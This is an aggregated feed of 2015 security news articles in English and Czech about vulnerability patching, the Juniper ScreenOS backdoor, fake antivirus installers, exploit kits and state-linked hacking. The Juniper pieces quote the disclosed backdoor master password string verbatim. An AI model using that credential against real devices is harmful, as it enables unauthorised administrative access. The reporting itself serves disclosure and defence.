You can’t be invulnerable, but you can be well protected
Software vulnerabilities are one of those problems that potentially affect all users. A vulnerability is a fault in a program’s implementation that can be used by attackers to gain unauthorized access to data, inject malicious code or put a system out of operation. In most cases, vulnerabilities arise from a lack of attention to fine details at the design stage rather than programming errors. Sometimes a system can seem virtually invulnerable at the design stage, but then, at some point, a new technology arises and hackers prove that the system can be successfully attacked. A notable example is DES – a symmetric-key encryption algorithm developed in 1975, which was considered bulletproof at the time. However, in 1990 it was successfully broken in 39 days using an enormous computer network. A supercomputer built in 1998 succeeded in breaking DES in less than three days.

Continually testing popular software to identify vulnerabilities and releasing patches to close any vulnerabilities found is part of a program’s normal lifecycle. The more sophisticated and popular the program the higher the chances of vulnerabilities being found in it.

Searching for vulnerabilities

Most developers try to close any vulnerabilities found in their products in a timely manner. They analyze their software independently or with the help of external experts. However, third-party researchers also hunt for vulnerabilities. Some do this to improve the overall level of security online. Others are paid to search for vulnerabilities. Still others prefer to sell information on any vulnerabilities they discover on the black market.

They can do this because information on new vulnerabilities is valuable for cybercriminals. If a researcher finds a flaw in a system and proves that it can be exploited in practice (that is, if he writes an exploit), he can make tens of thousands of dollars on the black market. There is an entire sector of the cybercriminal underworld that specializes in finding and selling vulnerabilities.

Luckily, this business does not operate on a mass scale. One reason for this is that not all vulnerabilities can be exploited in the real world. A combination of different conditions is often needed to be able to do real harm and the chances of these combinations arising are not very high. A second reason is that it takes a highly skilled programmer to write an effective exploit, and there are not many of them around.

One more option for making money on vulnerabilities is to sell them to third-party companies that, at first glance, seem to have nothing to do with crime. This is what some researchers do. However, these companies may be involved in creating spyware for governments or special services, so the vulnerabilities will still be used to illegitimately manipulate information systems. Moreover, it turns out that the security of such companies is not always as good as it ought to be, so occasionally external parties are able to gain access to their knowledge, with dire consequences.

Idealists, who search for vulnerabilities for the sake of universal security, face a dilemma. On the one hand, the later they publicly announce their discovery, the more time the developers have to fix the problem. On the other, the earlier they publish the information the sooner users will learn about the danger posed by the vulnerability. In theory, cybercriminals might also discover the vulnerability and immediately take advantage of it. It should also be kept in mind that disclosing the information will inevitably result in attempts to abuse the newly discovered vulnerability. Sometimes, attacks can start within an hour of making information about a vulnerability public. This is what happened, for example, after the Shellshock disclosure.

What are the dangers of vulnerabilities?

An exploit is a program or code fragment that uses vulnerabilities to attack a computing system. In some cases, an exploit is used on a mass scale – that is, cybercriminals try to use it to attack a broad range of systems. In such cases, vulnerabilities in popular software (such as the Adobe Flash Player) are exploited to deliver payloads to user machines. This is commonly done via so-called drive-by attacks that attempt to download malicious code to the computers of all users visiting an infected website.

Sometimes cybercriminals develop targeted attacks. They analyze the software used by a particular company and write targeted exploits for those specific programs. One such highly tailored attack was carried out as part of the Duqu 2.0 APT.

The ‘useful’ life of exploits can vary. Some are used for years, even though developers release patches that close the relevant vulnerabilities. This is because some users are in no hurry to install those patches.

According to Kaspersky Lab data, today cybercriminals extensively use exploits for the vulnerabilities listed below:

Software product Vulnerability
Adobe Flash Player
Microsoft Internet Explorer
Microsoft Office CVE-2012-0158
Microsoft Windows CVE-2015-1701
It is easy to see from CVE identifiers that most of these vulnerabilities were discovered this year, but there are also some that date back to 2014 and even 2012. The fact that these vulnerabilities are still being exploited means that many users have not bothered to update the relevant software.

Defending against exploits

The main recommendations are really quite simple: remember to update your software regularly and do not use outdated software. The latter piece of advice can be hard to follow: it is sometimes difficult to find a new alternative to a familiar and convenient program that is outdated. While developers do not track vulnerabilities in obsolete software or release patches for them, cybercriminals continue to watch for an opportunity to exploit. The upshot is that you need additional protection to continue using such software.

There are dedicated tools designed to scan computers for known vulnerabilities and, if detected, automatically install updates. These tools include, for example, Kaspersky Systems Management components Vulnerability Assessment and Patch Management. Kaspersky Lab is also developing a similar solution for home users called Kaspersky Software Updater. The utility is currently in beta testing.

Kaspersky Lab uses a vulnerability naming system that is different from the codes used in the CVE (Common Vulnerabilities and Exposures) system. While an identifier in CVE always corresponds to one vulnerability, a code in our system can match a group of vulnerabilities (in most cases, vulnerabilities closed with one patch or vulnerabilities in one version of a program) – sometimes dozens of vulnerabilities are covered by one code (depending on the patches released by software vendors). As a result, the 20 KLA vulnerabilities listed below actually match 375 CVE vulnerabilities.

According to Kaspersky Security Network statistics, vulnerability scanning most often identifies the following sets of vulnerabilities on our users’ machines:

KLA Number of users Date of discovery Description
1 KLA10680 308219 2015-10-14 Code execution vulnerability in Adobe Flash Player
2 KLA10036 256383 2014-07-08 Multiple vulnerabilities in Adobe Flash and Adobe AIR
3 KLA10492 228454 2013-10-16 Multiple vulnerabilities in Oracle products
4 KLA10670 182972 2015-09-21 Multiple vulnerabilities in Adobe products
5 KLA10650 176435 2015-08-11 Multiple vulnerabilities in Adobe products
6 KLA10653 150987 2015-05-18 Code execution vulnerability in QuickTime
7 KLA10682 150960 2015-10-13 Multiple vulnerabilities in Adobe Acrobat and Reader
8 KLA10628 138039 2015-07-14 Multiple vulnerabilities in Adobe Acrobat
9 KLA10651 135291 2015-08-17 Code injection vulnerability in VLC Media Player
10 KLA10655 134824 2015-09-01 Multiple vulnerabilities in Google Chrome
11 KLA10672 108722 2015-09-22 Multiple vulnerabilities in Mozilla Firefox
12 KLA10654 107661 2015-08-27 Multiple vulnerabilities in Mozilla Firefox
13 KLA10691 103880 2015-11-10 Multiple vulnerabilities in Google Chrome
14 KLA10344 100311 2009-11-05 Multiple vulnerabilities in Sun Java SE
15 KLA10669 92345 2015-09-16 Multiple vulnerabilities in Apple iTunes
16 KLA10684 91013 2015-10-22 Code execution vulnerability in Flash plugin for Google Chrome
17 KLA10663 87898 2015-09-08 Code execution vulnerability in Adobe Shockwave Player
18 KLA10690 87478 2015-11-10 Multiple vulnerabilities in Adobe products
19 KLA10569 86657 2015-04-28 Vulnerability in OpenOffice
20 KLA10671 84380 2015-09-21 Flash Player update for Google Chrome
Vulnerability sets KLA10680 and KLA10650 are particularly notable. The former includes, among others, CVE-2015-7645, the latter — CVE-2015-5560. These vulnerabilities are also present in the first table above, which lists the most commonly exploited software flaws.

Naturally, security products also include technologies designed to block attempts to exploit vulnerabilities. They closely track application behavior (particularly that of applications known to be prone to vulnerabilities), identify and block suspicious activity.

How is the security industry doing?

Vulnerabilities can be found in security solutions, just like in any other software products. The only difference is that security vendors have a much greater responsibility, because security software is essentially the last line of defense. That is why Internet security companies are especially careful and thorough when it comes to checking products for vulnerabilities.

We cannot speak for the industry as a whole, so we are going to use the only example we are familiar with – that is, our own. We keep the security of our products in mind at all stages of development, from defining the attack surface at the design stage to special testing procedures aimed at identifying possible vulnerabilities in products that are nearly ready to be released. In the process of development, R&D staff not only create the necessary product functionality but also make certain that the new features cannot be used to compromise the program’s integrity.

We believe that this approach is more effective than a dedicated team responsible for tracking vulnerabilities in all of the company’s products. Which is not to say that we do not have such a team. A group of security architects regularly checks newly developed code for vulnerabilities using fuzz testing (so-called fuzzing) and penetration testing.

Fuzzing essentially means checking a program for unintended operations by inputting incorrect or random data. In other words, products are tested on abnormal or distorted data sets.

Penetration testing is carried out both internally and by external experts. It should be noted at this point, however, that in our experience, few external experts are sufficiently knowledgeable about the way security products work and can therefore effectively search for vulnerabilities. Additionally, Kaspersky Lab has a special team that specializes in searching third-party code for vulnerabilities (its services are used, among others, by banks seeking to verify the security of their applications). Even though third-party applications are the team’s top priority, these experts also analyze code developed in-house.

We also value the opinions of independent researchers. Any person who has found a vulnerability in our technologies can report it using a special communication channel that can be found here. Kaspersky Lab experts will thoroughly analyze all data coming via the channel. The procedure is as follows: first, our analysts confirm that there really is a vulnerability. After confirming this, we contact the independent researcher and agree on a time when this information will be made public. Meanwhile, the data is provided to the R&D team responsible for developing the technology; we also check whether the vulnerability is present in any other Kaspersky Lab products. It should be noted that sometimes independent researchers do draw our attention to serious issues. We really appreciate this!

A few practical recommendations

Since only software developers can significantly improve the situation, here are some recommendations:

As we have said many times before, update your software. If the developer provides an update for its product, the chances are that it does so for a good reason.
Do not disable automatic updates. True, this can be a bit of a nuisance if you have lots of programs, but security is what really counts.
Remove the programs you no longer use. There is no reason for this dead weight to remain on your hard drive. One day such programs could do you a grave disservice.
Do not use obsolete software. If it is really such a handy, useful program, there must be other similar programs available. True, it can be hard to abandon a familiar interface, but it is better to spend a few days getting used to a new one than using vulnerable software.
Regularly scan your computer for known vulnerabilities using dedicated utilities.

Hackers in the wild attempt to exploit the Juniper Backdoor

A honeypot set up by researchers at the SANS institute has shown that hackers have already attempted to exploit the Juniper backdoor.
Shortly after Juniper posted the advisory related to the presence of unauthorized code in the OS of some of its Firewalls, HD Moore, the developer of the Rapid7′ Metasploit Framework, revealed that approximately 26,000 Netscreen devices are connected to the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

Ronald Prins, founder and CTO of the Fox-IT security firm, explained that by reverse engineering the patch released by Juniper its experts were able to discover the master password backdoor (“<<< %s(un=’%s’) = %u,“).

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” he told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].” explained Prins.

The security firms Fox-IT has also released the Snort rules that can be used by the sys admins to detect unauthorized access to the Juniper devices through the backdoor.

News of the day is that a honeypot set up by researchers at the SANS Technology Institute’s Internet Storm Center (ISC) has identified attacks attempting to exploit the recently disclosed vulnerability in the Juniper firewalls. Let’s remind that the exploitation of the flaw could allow attackers to gain administrative access to the network devices.

“Since our initial announcement we’ve learned that the number of versions of ScreenO affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” reported Juniper shared inviting administrators to apply the security updates as soon as possible.

The two vulnerabilities can be respectively exploited to remotely gain administrative access to a device via telnet or SSH (CVE-2015-7755) and to decrypt VPN traffic (CVE-2015-7756).

Researchers at the SANS Technology Institute have deployed a honeypot that emulates the Juniper devices running the ScreenOS, attracting threat actors in the wild. The researchers revealed that at the Technology Institute revealed that hackers have been using the backdoor password recently disclosed in an attempt to access the honeypot via SSH.

“Our honeypot doesn’t emulate ScreenOS beyond the login banner, so we do not know what the attackers are up to, but some of the attacks appear to be ‘manual’ in that we do see the attacker trying different commands,” said Johannes Ullrich from the SANS Technology Institute.

Juniper attacks honeypot SANS

Juniper attacks honeypot SANS
The experts observed tens of exploit attempts, most of which used the usernames “root” and “admin.” Below the complete list of username used by hackers:

| username | count(*) |
| root | 29 |
| admin | 18 |
| netscreen | 8 |
| login | 8 |
| administrator | 5 |
| test | 4 |
| system | 2 |
| bob | 1 |
| sdes | 1 |
| sqzeds | 1 |
| sqzds | 1 |
The researchers also collected the source IP addresses used by attackers, in one case the IP was involved in the 24 attacks.

Altogether 78 attacks were observed in about 5 hours, one of the IPs belongs to security firm Qualys, presumably the attacks from this source are the result of research activities.

| ip | count(*) |
| | 24 |
| | 8 |
| | 7 |
| | 7 |
| | 5 |
| | 4 |<- Qualys (probably "research")
| | 4 |
| | 4 |
| | 4 |
| | 3 |
| | 2 |
| | 2 |
| | 1 |
| | 1 |
| | 1 |
| | 1 |
After the disclosure of the presence of the unauthorized code in the Juniper network appliances, the networking giant Cisco decided to assess its products for the presence of malicious codes.

“Although our normal practices should detect unauthorized software, we recognize that no process can eliminate all risk,” Cisco’s Anthony Grieco said. “Our additional review includes penetration testing and code reviews by engineers with deep networking and cryptography experience.”

Pozor na falešné antiviry či antimalware. Hlídejte, odkud stahujete

23.12.2015 Viry

Pozor si dávat musíte nejenom na to, abyste si nepořídili antimalware/antivir, který jím není, ale také na to, zda ten pravý stahujete z pravého zdroje.
Malwarebytes jsou tvůrci jednoho antimalware software, který vám prohledá počítač na výskyt věcí, které antivirové firmy nepovažují za hrozbu. Nejsou jediní, ale rozhodně patří mezi těch pár, které se vyplatí mít ve výbavě pro občasnou kontrolu počítače, případně pro moment, kdy se váš počítač chová podivně.

V PUPs Masquerade as Installer for Antivirus and Anti-Adware varují, že narazili i na vlastní falešný program. V praxi pak ukazují falešné programy vyskytující se na antivirus-dld[dot]com, což ale vlastně není nic nového. Je běžné, že neznalý uživatel na podobné věci narazí ve vyhledávání, případně se nechá ke stažení něčeho takového zlákat přes falešné varování při instalaci jiných programů.

Na výše uvedené adrese ale vedle falešného AdwCleaneru najdete i falešný antivirus od AVG. Nebo, lépe řečeno, skutečné AVG tam nakonec získáte, ale spolu s ním do počítače stáhnete také nějaký ten malware, adware či crapware. Jak sami Malwarebytes upozorňují, pikantní na tom všem je, že touto cestou stažené AVG nakonec při spuštění kontroly počítače dokonce najde původní podvodný instalační program.

Nabídka falešného AdwCleaneru se ani stažením původního programu nezabývá, pouze vykoná špinavou práci a poté uživatele přesměruje na web, kde si může stáhnout skutečný AdwCleaner.

Na téhle zdánlivě malé aktivitě je ale daleko podstatnější to, že výše zmíněný web má řadu společných prvků s desítkami dalších webů, které slouží k témuž účelu. Jde o důsledně propracovaný systém na lapání nezkušených nešťastníků. Systém, který velmi podobně funguje na webech, kde si „zdarma“ můžete stáhnout nějaký software. Jen výjimečně ale bez přibalení něčeho, co jste nechtěli.

Abyste se podobnému nebezpečí vyhnuli, musíte velmi důsledně vyhledávat originál a nespokojovat se s kopiemi, které jsou dnes běžně doplněny něčím, co nechcete (a čemu se ne nadarmo říká PUP, potentially unwanted programs).

Oracle Ordered to Publicly Admit Misleading Java Security Updates
Security issues have long tantalized over 850 Million users that have Oracle's Java software installed on their computers. The worst thing is that the software was not fully updated or secure for years, exposing millions of PCs to attack.
And for this reason, Oracle is now paying the price.
Oracle has been accused by the US government of misleading consumers about the security of its Java software.
Oracle is settling with the Federal Trade Commission (FTC) over charges that it "deceived" its customers by failing to warn them about the security upgrades.
Java is a software that comes pre-installed on many computers and helps them run web applications, including online calculators, chatrooms, games, and even 3D image viewing.
Oracle Left Over 850 Million PCs at Risk
The FTC has issued a press release that says it has won concessions in a settlement with Oracle over its failure to uninstall older and insecure Java SE software from customer PCs upon the upgrade process, which left up to 850 Million PCs susceptible to hacking attacks.
However, the company was only upgrading the most recent version of the software and ignoring the older versions that were often chock full of security loopholes that could be exploited by hackers in order to hack a targeted PC.
Oracle is Now Paying the Price
So, under the terms of the settlement with Oracle, announced by the FTC on Monday, Oracle is required to:
Notify Java customers about the issue via Twitter, Facebook, and its official website
Provide tools and instructions on how to remove older versions of Java software
Oracle has agreed to the settlement that is now subject to public comment for 30 days, although Oracle declined to comment on its part.
Meanwhile, the FTC wants Java users to know that if they have older versions of the software. Here is the website that will help you remove them:

How to Crash Your Friends' WhatsApp Just By Sending Crazy Smileys
What would require crashing the wildly popular WhatsApp messaging application?
Nearly 4000 Smileys.
Yes, you can crash your friends' WhatsApp, both WhatsApp Web and mobile application, by sending them not any specially crafted messages, but just Smileys.
Indrajeet Bhuyan, an independent researcher, has reported The Hacker News a new bug in WhatsApp that could allow anyone to remotely crash most popular messaging app just by sending nearly 4000 emojis to the target user, thereby affecting up to 1 Billion users.
Bhuyan is the same researcher who reported a very popular WhatsApp crash bug last year that required 2000 words (2kb in size) message in the special character set to remotely crash Whatsapp messenger app.
After this discovery, the company patched the bug by setting up the limits of characters in WhatsApp text messages, but unfortunately, it failed to set up limits for smileys send via WhatsApp.
"In WhatsApp Web, Whatsapp allows 65500-6600 characters, but after typing about 4200-4400 smiley browser starts to slow down," Bhuyan wrote in his blog post. "But since the limit is not yet reached so WhatsApp allows to go on inserting...when it receives it overflows the buffer and it crashes."
The recent bug tested on Android devices by multiple brands and successfully crashed:
WhatsApp for Android devices including Marshmallow, Lollipop and Kitkat
WhatsApp Web for Chrome, Opera and Firefox web browsers.
It is sure that the latest version of WhatsApp is affected by this bug.
Video Demonstration

You can also watch the Proof-of-Concept (PoC) video that shows the attack in work.

How to Protect Yourself
Bhuyan told The Hacker News that he had reported the WhatsApp crash bug to Facebook. However, before the company patches the issue, there is a simple way out.
If you become a victim of such message on WhatsApp, just open your messenger and delete the whole conversation with the sender.
However, remember, if you have kept some records of your chat with that particular friend, you’ll end up losing them all.
At the beginning of this year, Bhuyan also reported two separate bugs — WhatsApp Photo Privacy bug and WhatsApp Web Photo Sync Bug — in the WhatsApp web client that in some way exposes its users’ privacy.

Encrypted Email Servers Seized by German Authorities After School Bomb Threats
In the wake of a hoax bomb threat, all public schools in Los Angeles were closed for a day last week, and now German authorities have seized an encrypted email server.
But, Does that make sense?
In a video statement posted on Monday, the administrator of – an anonymous email provider service – said German authorities had seized a hard drive from one of its servers that used to host the service in a Bavarian data center.
The email provider was thought to have been used last week to send bomb threatening emails to several school districts across the United States, resulting in the closure of all schools in the Los Angeles Unified School District.
Despite The New York City Department of Education dismissed the e-mail as an obvious hoax, German authorities seized a hard drive that, according to the service admin, actually holds "all data" on the company.
According to the service administrator Vincent Canfield, "SSL keys and private keys and full mail content of all 64,500 of my users...hashed passwords, registration time, and the last seven days of logs were all confiscated and now are in the hands of German authorities." is Still Functional, but All Sensitive Data is in the Hands of Authorities
However, is still operational because it was hosted on a server utilizing a pair of drives in a RAID1 configuration – a method where data is stored to two hard drives simultaneously to minimize the chance of data being lost if one of the drives fails.
German authorities took one of the hard drives, but the other mirror drive is still in use.
But the significant risk still remains – the German authorities have had their hands on a lot of sensitive data of the users including:
SSL keys and Private keys
Full mail content of all users
Hashed passwords
Registration time
The last seven days of logs was launched in late 2013 and has since garnered more than 28,000 registered accounts under its domain.
Canfield has retained Jesselyn Radack, a well-known attorney who is representing former National Security Agency (NSA) contractor Edward Snowden as well as former NSA whistleblower Thomas Drake.

Who planted the Juniper ScreenOS Authentication Backdoor?


Who planted the Authentication Backdoor in the Juniper ScreenOS? Security experts are making their speculation, but interesting revelations are coming out.
While the FBI is investigating the case searching for responsible for the introduction of a backdoor in a number of Juniper network devices, a number of speculation are circulating on the Internet. Juniper Networks is a technology provider for the US Government and many US federal agencies, including the FBI, this means that attackers may have had access to the traffic related to connections protected through VPNs.

Someone is blaming China, other the NSA, and the majority is pointing a more generic nation-state actor.

The experts that blame the Chinese Government sustain that the compromised appliance was originally developed by the NetScreen Technologies company that was acquired by Juniper Networks in 2004. The NetScreen Technologies was founded by Chinese nationals, for this reason some experts believe that Chinese experts have a deep knowledge of the compromised ScreenOS.

“It’s not hard to find evidence of ongoing work on ScreenOS in Beijing: a quick trawl of LinkedIn turns up several Juniper employees who work on the operating system. The Register in no way suggests that those who work in Juniper’s Beijing offices are in any way associated with the unauthorised code. We nonetheless asked Juniper if the code is known to have come from the Beijing facility.” states a blog post published by The Register.

Many experts speculate the involvement of the NSA, one of the documents leaked by Edward Snowden and disclosed by the German Der Spiegel revealed that the US intelligence had the ability to plant a backdoor in various network equipment, including Juniper firewalls.

NSA Juniper implant

There is also speculation that the two backdoors might not be the work of the same state-actor, as they are not connected.

According to the German online magazine, hackers belonging to the ANT division (Advanced or Access Network Technology), operating under the NSA’s department for Tailored Access Operations (TAO),

“In the case of Juniper, the name of this particular digital lock pick is “FEEDTROUGH.” This malware burrows into Juniper firewalls and makes it possible to smuggle other NSA programs into mainframe computers. Thanks to FEEDTROUGH, these implants can, by design, even survive “across reboots and software upgrades.” In this way, US government spies can secure themselves a permanent presence in computer networks. The catalog states that FEEDTROUGH “has been deployed on many target platforms.” states the Der Spiegel online.

HD Moore, the developer of the Rapid7′ Metasploit Framework, confirmed that there are roughly 26,000 Netscreen devices exposed on the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

HD Moore added that the backdoor might date back to late 2013, and the encryption backdoor to 2012.

“This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).”

Ronald Prins, founder and CTO of Fox-IT, a Dutch security firm, explained that reverse engineering the patch released by Juniper he was able to discover the master password backdoor (“<<< %s(un=’%s’) = %u,“).

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” he told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].” explained Prins.

Fox-IT has also released the Snort rules that can be used by the sys admins to detect unauthorized access to the Juniper devices through the backdoor.

“Since our initial announcement we’ve learned that the number of versions of ScreenO affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” reported Juniper shared inviting administrators to apply the security updates as soon as possible.

The unique certainly is that someone deliberately inserted a backdoor password into Juniper network devices.

Chinese hackers target Taiwanese Opposition Party and media

Security experts at FireEye have uncovered a spear phishing campaign managed by Chinese hackers that is targeting Taiwan Opposition and Media ahead of the vote in January.
According to FireEye a group of Chinese hackers is targeting Taiwan’s opposition party and journalists, security experts and officials. The attacks are occurring weeks away from a Taiwanese presidential election.

The hackers are trying to compromise Taiwanese news organizations for intelligence purpose and obtain election-related information.

“Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.” states the report published by FireEye.

The representatives of the main opposition Democratic Progressive Party (DPP) seem to have the favor of voters at the expense of the other party politics closer to the Chinese Government.

Chinese hackers target Taiwan

In the past, the Taiwanese government websites were constantly under attack from China, not experts at FireEye identified nation-state actor that is running a spear phishing campaign on Taiwanese journalists with the subject-line reading “DPP’s Contact Information Update” earlier this month.

“Each phishing message contained the same malicious Microsoft Word attachment. The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website, as both discussed national defense topics and carried the same byline. The lure documents also used the Japanese calendar, as indicated by the 27th year in the Heisei period. This demonstrates that the threat actors understand conventional Japanese date notation.”

In March, the DPP’s website was brought down remaining down for at least four days, also in that case the experts blamed Chinese hackers.

“We often received fake emails pretending to come from our colleagues, asking us to click some links or download some documents,” said Ketty Chen, deputy director of the DPP’s international affairs department.

Analyzing the TTPs of the threat actors the experts at FireEye confirmed the Chinese origin of the threat and their intention to gather information relating to the upcoming election.

“Given the timing of these attacks, the reporters targeted, and the information used as a lure, it is possible that the attackers are seeking information relating to the upcoming election and about the DPP in particular,” Bryce Boland, chief technology officer for Asia Pacific at FireEye, told to Agence France-Presse

It is a state of emergency in Taiwan, and in particular for the Democratic Progressive Party, its politicians are a privileged target for alleged state-sponsored hackers.

A DPP official working for the cyber security of the Party, speaking on condition of anonymity, revealed that the organization is “constantly on guard” and conducts regular Internet security training for its staff.

Angler exploit kit includes the code of a recent Flash flaw

A security researcher discovered a new variant of the Angler exploit kit that includes the exploit code for a recently patched Adobe Flash Player flaw.
The French security researcher “Kafeine” has discovered a new variant of the popular Angler exploit kit that includes the exploit code for a recently patched Adobe Flash Player vulnerability (CVE-2015-8446). Kafeine reported that new exploit code was added to the Angler exploit kit on December 14.

The new Angler exploit kit has been used by threat actors in the wild to spread the TeslaCrypt ransomware.

Once the ransomware infects a PC, it encrypts files and renames them with a .vvv extension requesting the payment of a $500 ransom within one week, after which the price to recover the files increases to $1,000.

The CVE-2015-8446 vulnerability is a Flash Player heap buffer overflow flaw that Adobe patched on December 8. had been added to Angler.

angler exploit kit flash

This vulnerability was discovered by an anonymous researcher who reported it via the Zero Day Initiative (ZDI). Recently Adobe released Flash Player and versions (Desktop Runtime with support for Firefox and Safari) that fixed 77 security issues.

Kafeine added that the exploit for the Flash vulnerability has been used by threat actors to deliver the Bedep Trojan Downloader.

Last week experts at Malwarebytes confirmed that the code for the CVE-2015-8446 exploit included in the Angler Exploit kit had been used by cyber criminals to serve the TeslaCrypt ransomware.

Once it infects a computer, the ransomware encrypts files and renames them with a .vvv extension. Victims are instructed to pay $500 within one week, after which the price for the private key needed to recover the files increases to $1,000.

The experts noticed that the new variant of the Angler Exploit Kit had a low detection rate at the time of its discovery.

Iranian hackers penetrated computers of a small dam in NY

Iranian hackers penetrated the industrial control system of a dam near New York City in 2013, raising concerns about the security of US critical infrastructure.
It is official, Iranian hackers violated the online control system of a New York dam in 2013. According to reports, the hackers penetrated the control system of the dam and poked around inside the system.

The Wall Street Journal reported that hackers penetrated the system of the critical infrastructure through a cellular modem. The Journal cited an unclassified Homeland Security summary of the case. At the time I was writing the Department of Homeland Security has declined to comment on the cyber attack.

The Wall Street Journal cited to anonymous sources that revealed the hackers targeted the Bowman Avenue Dam, which is a small facility 20 miles outside of New York.

“It’s very, very small,” Rye City Manager Marcus Serrano told the newspaper, confirming that FBI agents investigated the case in 2013.

Fortunately, the intruders were not able to gain complete control of the control systems. The hackers used a machine that scanned the Internet for vulnerable US

The hackers used a machine that scanned the Internet for vulnerable US industrial control systems (ICS) , but the strange circumstance is that threat actors appeared to be focusing on a specific range of internet addresses.

iranian hackers violated ICS New York Dam

The US cyber experts once discovered the attack have tracked back the intruders, the evidence collected suggests the involvement of Iranian hackers, probably the same groups that focused their operations on American companies and organizations.

Exactly one year ago, the experts at security firm Cylance revealed that Iranian hackers were targeting airlines, energy, defense companies worldwide as part of the Operation Cleaver campaign.

The fact that foreign hackers target US critical infrastructure is not a novelty, a report issued by The Department of Homeland Security (DHS) in November 2014 revealed that Russian hackers have infiltrated several critical infrastructure in the United States.

The US has the highest number of ICS and SCADA systems exposed on the internet and many of them are easily identifiable with search engines like Shodan or Censys. Researchers at Shodan recently revealed that the US have nearly 57,000 industrial control systems connected to the Internet.

A recent wave of attacks conducted by Iranian hackers came after a period of apparent calm. The cyber security experts noticed an evolution of the TTPs of the Iranian hackers that were initially focused on targets belonging to the financial industry, their activities were limited to sabotage and disruption of the targeted infrastructures, such as in the attack on casino company Las Vegas Sands Corp.

The recent attacks against The State Department attack is clearly a cyber espionage operation, they were initially attributed to Chinese hackers who may have infiltrated the department’s unclassified e-mail systems. Let’s remind that security experts at Facebook were first noticed the intrusion of Iranian Hackers in the e-mail accounts of US State Department officials focused on Iran.

Needless to emphasize the importance of activities of threat intelligence to prevent these accidents and mitigate cyber threats.

HTTP má nový stavový kód 451. Webmasteři by se ho měli děsit

V posledních letech roste zástup webů, které byly zrušeny z moci úřední – třeba z důvodu porušování autorských práv, kriminality (dětská pornografie, prodej drog) aj. Podobné weby často prostě přestaly fungovat, ačkoliv v případě USA se na nich alespoň často zobrazovalo úřední vysvětlení. To byl případ i Megauploadu.

Na adrese se dlouhé měsíce zobrazovalo toto hlášení o zabavení a vyšetřování. Nyní už mlčí.

Organizace IETF nyní pro tyto případy konečně zavedla chybový kód, vysvětlení tedy bude moci zobrazit přímo prohlížeč. Pokud webový server vrátí stavový kód 451

Hlavička HTTP odpovědi by mohla vypadat takto:

HTTP/1.1 451 Unavailable For Legal Reasons
Link:; rel=”blocked-by”
Content-Type: text/html

Součástí odpovědi tedy může být i odkaz na více informací a prohlížeč pak může zobrazit vlastní chybovou hlášku s informací, že stránka byla zrušena z legálních důvodů, přičemž surfař najde více informací na zmíněné adrese.

Ačkoliv chybový kód ještě nebyl plně schválen, autoři tvrdí, že už jej mohou webové servery běžně používat, formální standardizaci totiž brání už jen formality.

Routery Juniper Networks obsahují tajný kód, který dešifruje VPN provoz

21.12.2015 Sledování

Přítomnost „neautorizovaného“ kódu sloužícího pro dešifrování VPN provozu v routerech Juniper Networks je dost závažným problémem.
Sdílet na Facebooku Odeslat na Twitter Sdílet na Google+
Nálepky: Backdoor Bezpečnost Hack Juniper Networks router Šifrování VPN
Interní kontrola kódu u Juniper Networks odhalila velmi nepříjemnou situaci: do routerů se dostal „neautorizovaný kód“, který mohl případnému útočníkovi poskytnout přístup správce a poté umožnit dešifrovat VPN komunikace. Problém se týká zařízení NetScreen používajících ScreenOS od 6.2.0r15 až 6.2.0r18 a 6.3.0r14 až 6.3.0r20.

Pokud předmětná zařízení používáte, Juniper Networks už vydali opravu, která by tento kód měla odstranit.

Na celé události je nejzajímavější to, že může mít souvislost s informacemi (viz Der Spiegel) o NSA snažící se proniknout do zařízení Juniperu s cílem získat zadní vrátka pro přístup. V dokumentech NSA je tato snaha označena jako FEEDTHROUGH a mělo by jít o malware, který je schopen přístupu do firewallu od Juniperu a dokáže přežít i aktualizace softwaru.

Neautorizovaný kód je také aktuálně předmětem šetření americké vlády a prověřuje se i možnost, že mohlo jít o aktivitu jiné vlády nebo o organizovanou kriminalitu.

Juniper Networks žádné bližší informace neposkytli a najít na jejich webových stránkách informaci o incidentu je poměrně obtížné, zkuste případně 2015–12 Out of Cycle Security Bulletin: ScreenOS: Multiple Security issues with ScreenOS (CVE-2015–7755, CVE-2015–7756). Případně přímo CVE-2015–7755 a CVE-2015–7756.

Zajímavé a užitečné ale může být CVE-2015–7755: Juniper ScreenOS Authentication Backdoor, kde zjistíte i univerzální heslo, které bylo použitelné pro přístup (<<< %s(un=‚%s‘) = %u) a které je v podobě, která umožňuje jeho snadné přehlédnutí.

Nová verze BIND opravuje zranitelnosti

21.12.2015 Zranitelnosti

